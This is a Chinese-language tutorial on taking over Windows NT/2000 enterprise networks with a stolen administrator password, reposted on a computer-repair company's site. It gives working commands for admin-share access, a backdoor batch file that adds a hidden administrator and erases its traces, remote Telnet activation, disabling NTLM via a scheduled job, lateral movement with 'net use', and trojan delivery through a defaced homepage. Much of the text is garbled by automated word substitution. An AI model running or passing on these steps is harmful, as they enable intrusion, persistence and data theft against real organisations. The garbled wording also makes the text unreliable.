NT完全入侵教程
现在的企业当中一样平常都是使用的NT系统,也不得不承认,NT系统简直黑白常得当企业使用的操作系统,但是“黑客”的打击引来了企业信息宁静危急……
失掉了NT的管理员暗码还能做什么,还不是想做什么就做什么呗。但究竟能做什么呢?能详细答出来的只怕不会很多,并且很多企业系统管理员就以为暗码为空没什么,因为他们压根就不晓得“黑客”会怎样做。本文先容的便是失掉NT的管理员暗码以后入侵一个企业盘算机群的低级和中级伎俩,尤其是在一个大型企业当中,企业系统管理员的暗码每每关系着整个公司的信息泄密,以及公司的数据的丢失,紧张的影响到一个企业的发展和生活。
起首,我们先假定失掉了某个企业的一台办事器192.168.0.1的Administrator的暗码,而对方没有封闭139端口。
1.平凡共享资源的入侵
这种入侵伎俩可说是NT最简略的入侵了。任意在本身呆板的哪个窗口的地点栏里输出“\\192.168.0.1”大概等1-2秒,对方就会要求你输出用户名和暗码,输出所失掉的用户名和暗码以后就可以进入,并可以看到这台办事器在企业中的共享资源了。由于权限是Admin以是你险些可以删除对方共享资源里的任何东西。(要是设置了共享为只读那就没措施了)
2.默许及隐蔽共享资源的入侵
在说这种入侵要领之前我先来给各人先容一个NT的IPC$毗连,在默许环境下NT系统有一个特别的隐蔽共享,便是IPC$共享。IPC$是专门用在NT中的一种管道通讯,NT系统之间的通讯大部门都在IPC$通讯中完成的。
这次伎俩绝对高明一点,但照旧很简略的。不过关键照旧要看“黑客”怎样利用了,有的人大概只能删删文件,有的人却可以利用这个留下后门,以便下次要是暗码转变了后可以利用后门进入。同样在呆板里任意翻开一个窗口,在地点栏输出“\\192.168.0.1”就会要求输出暗码,输出以后所看到的东西和前面先容的一样。好了,现在同时也建立好IPC$毗连了,其着实提示你输出暗码时从输出窗口中也晓得了是建立IPC$毗连。然后我们再次在地点栏输出地点,这次输出的就有点不同了,输出“\\192.168.0.1\c$”大概过一会就呈现了对方C盘里全部的内容了。想看对方D盘吗?同样,输出“\\192.168.0.1\D$”就瞥见对方D盘了。然后想换这个企业的主页(倘使对方照旧一个Web办事器)可以说是轻而易举。记着由于权限是管理员固然可以写了,留不留后门就看“黑客”的想法咯。一样平常他们会在C盘(假定在C:\\WINNT下)建立一个批处理文件,假定文件名为hack.bat,其内容一样平常为:
net user hack 1234 /add (建立一个用户名为hack的用户,暗码为1234)
net localgroup administrators hack /add (让hack也是管理员)
del C:\Documents and Settings\Administrator\开端\菜单\步伐\启动\hack.lnk (删除启动文件夹里的快捷方式消弭足迹)
del c:\winnt\hack.bat (删除hack.bat这个文件消弭足迹)
这样当企业系统管理员在下次登岸时就会偷偷的添加一个用户了。固然其实添加用户算是一个比较愚蠢的留“后门”的要领了,以是其实很多“黑客”会放一个可以常驻内存的小步伐,然后建立一个类似的批处理文件和快捷方式,那么“黑客”基本上可以长期的占据企业中的这台主机了。
3.IPC$毗连入侵的高级本领
但是每个“黑客”都不大概那么笨,非要一直等到下次企业系统管理员登岸以后才可以占据,每每“黑客”会使用越发巧妙的伎俩,迅速的留下后门。起首他们照旧先建立IPC$毗连,毗连以后他们会使用种种伎俩开后门,比如翻开Telnet办事,“黑客”怎样翻开Telnet办事呢?其实有很多种要领,比如微软公司本身就出了一个小步伐“netsvc.exe”便是专门让系统管理员在建立IPC$毗连以后长途翻开办事用的管理东西,但这个东西到了“黑客”手中天然也成了必不可少的“黑客”东西了。在命令符下输出“netsvc \\192.168.0.1 telnet /start”大概等5分钟对方的Telnet办事就翻开了,然后“telnet 192.168.0.1”嘿嘿……等!必要NTLM验证,这下又把“黑客”拦在了外面了,这时他们又会用到一个小步伐了,便是专门封闭一个NTLM验证的步伐ntlm.exe。(固然也可以是其他名字)“copy ntlm.exe \\192.168.0.1\admin$\system32”把ntlm.exe复制到对方企业办事器的system32目次下。复制过去了,可怎样让他运转呢?固然多的是措施了。“net time \\192.168.0.1”看看对方系统时间为多少假定为18:00。现在再输出“at \\192.168.0.1 18:02 ntlm.exe”,等一会后,命令提示符表现新加使命 ID=1,意思是对方系统在18:02时运转ntlm.exe这个步伐,等到18:02以后,然后再“telnet 192.168.0.1”嘿嘿~这回是提示必要输出用户和暗码了,输出所失掉的管理员用户名和暗码以后就乐成的Telnet到了企业办事器了……
不过这样一下是Netsvc,一下又是At着实是麻烦,现在就先容另一个要领,起首照旧先谢谢微软为NT系统管理员提供的方便的管理功能,这一功能到了“黑客”手中可说是“黑客”的福音,不用“黑客”再这么麻烦的输出这样那样的命令了。建立好IPC$毗连以后(IPC$毗连公然是一种功能十分强大的管理毗连),翻开本地盘算机里的“盘算机管理”,用鼠标右键点盘算机管理窗口里的“盘算机管理(本地)”内里有“毗连到另一台盘算机”选择它,在“称号”里输出“192.168.0.1”确定以后,起首你的NT系统会看能否建立IPC$毗连,“有”就毗连上去了,现在你就可以间接受理192.168.0.1了,比如看他的日志,启动他的办事(固然包括Telnet了),管理他的IIS,什么都有。多研讨一下,连注销对方系统当前登岸的用户,重新启动对方盘算机,封闭对方盘算机都有,真是强大。NT系统到了“黑客”手中,整个系统都成了一个“黑客”东西了,并且是功能十分强大的“黑客”东西。启动了Telnet了,可照旧要NTLM验证怎样办?简略,在本地盘算机建立一个用户名和暗码雷同的用户,要是已有就把暗码改为雷同,然后使用这个用户在本地重新登岸,“telnet 192.168.0.1”嘿嘿~连暗码都不用输出了!因为通过NTLM验证了啊。
现在那些宁静意识差的企业系统管理员们晓得了袒露了管理员暗码的危险性了吧?还没完呢。都到这一步了还没完?呆板都被“黑客”完全控制了呀——是的,还没完,看吧!
4.深入入侵
这一步就必要“黑客”有富厚的履历,实战操作本领要求很高,也不再是笔墨能形貌清楚的了,下面就只能大略的先容一下。
“黑客”固然不会仅仅在攻馅一台办事器以后就立即罢手了,他会深入入侵你的内网,尤其是在一个企业中,每每都是盘算机群。那些商业特工“黑客”固然就越发的想入侵到企业外部去了。而很多企业系统管理员喜欢把全部的办事器的暗码设为雷同,就给“黑客”提供了一个良好的入侵条件。Telnet到对方办事器以后,输出“net view”企业中整个一个事情组或域的盘算机这时都一展无余。同样在Telnet里建立IPC$毗连以后象入侵这台办事器一样的入侵了。前面说的建立IPC$毗连都是使用的图形界面,但是这时候已经不再拥有图形界面了,现在假定企业内网的192.168.0.2的暗码和这台办事器暗码雷同,这时可以使用“net use \\192.168.0.2\IPC$ passwd/user:username”来建立IPC$毗连了,然后是映射驱动盘,输出“net use z: \\192.168.0.2\c$”这样就把192.168.0.2的C盘映射到192.168.0.1的Z盘去了。输出“z:”就可以象浏览192.168.0.1的硬盘一样,浏览192.168.0.2的C盘。而要是他是商业特工“黑客”,一旦发现内里有代价的东西天然不用说将来会发生什么事了。固然这每每还算是最好的条件,其实照旧有相称一部门企业系统管理员不会把暗码设为一样的。现在就看网络的环境了,要是入侵的恰好是一台主域控制器,嘿嘿,那对于商业特工来说但是高兴去世了,从速把本身升级成域管理员,这下整个企业的一个域的呆板都落在了他的手中。固然在“黑客”手中这也算是一种十分好的环境,但现在微软行行色色的漏洞越来越多,同时也根据“黑客”的履历的多少,决议着入侵内网的时机的巨细。
在一个企业中,每每直连续接Internet的是Web办事器。而一个有耐性的“黑客”,一个想入侵这个企业的商业特工固然会不惜统统本领入侵,此中一个伎俩便是利用Web办事。微软公司在今年呈现的MIME漏洞就有很好的利用代价。这里趁便先容一下MIME漏洞,MIME在处理不正常的MIME类型中存在问题,打击者可以建立一个包罗可执行文件的附件的HTML,E-mail并修改MIME头,使IE不正确处理这个MIME,而执行所指定的可执行文件附件。有了这个漏洞,“黑客”将会更换Web办事器的主页,在主页里把MEMI漏洞打击代码插进HTML中,使得企业外部的员工在浏览本身公司主页时运转指定的步伐。(企业外部绝对不大概历来不看本身的主页的,尤其是企业负责人,他们一样平常都市不定期的检查主页。)那么他们在浏览本身的主页时就无声无熄的执行了“黑客”所指定的步伐,这个步伐大概是木马,也大概同样是添加用户的批处理文件。
由上面可以看出一旦NT系统的暗码泄露是一件何等危险的事情,尤其在一个企业当中。同时一个企业网络的拓扑能否合理也起着十分紧张的作用,并且“黑客”尤其是商业特工所利用的伎俩远远不但有这些,他们还可以利用别的方式,比如电子邮件等种种途径来失掉企业外部的敏感信息或失密信息。
5.别的入侵
别的还可以通过3389端口入侵。3389是Win2000系统的自带的,并且是图形界面的,长途管理办事的端口。“黑客”一旦有了管理员暗码,危险性也越发直观化。另外便是通过IIS的管理入侵,在默许环境下IIS提供一个Web方式的管理办事,在c:\inetpub\wwwroot里有一个叫iisstar.asp的东西,要是可以拜访,并且有管理员暗码(NT4里不是管理员也可以,只需是NT的合法账号)就可以长途通过Web方式管理IIS信息办事,然后通过特别伎俩进一步控制整个呆板,然后是整个企业……
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
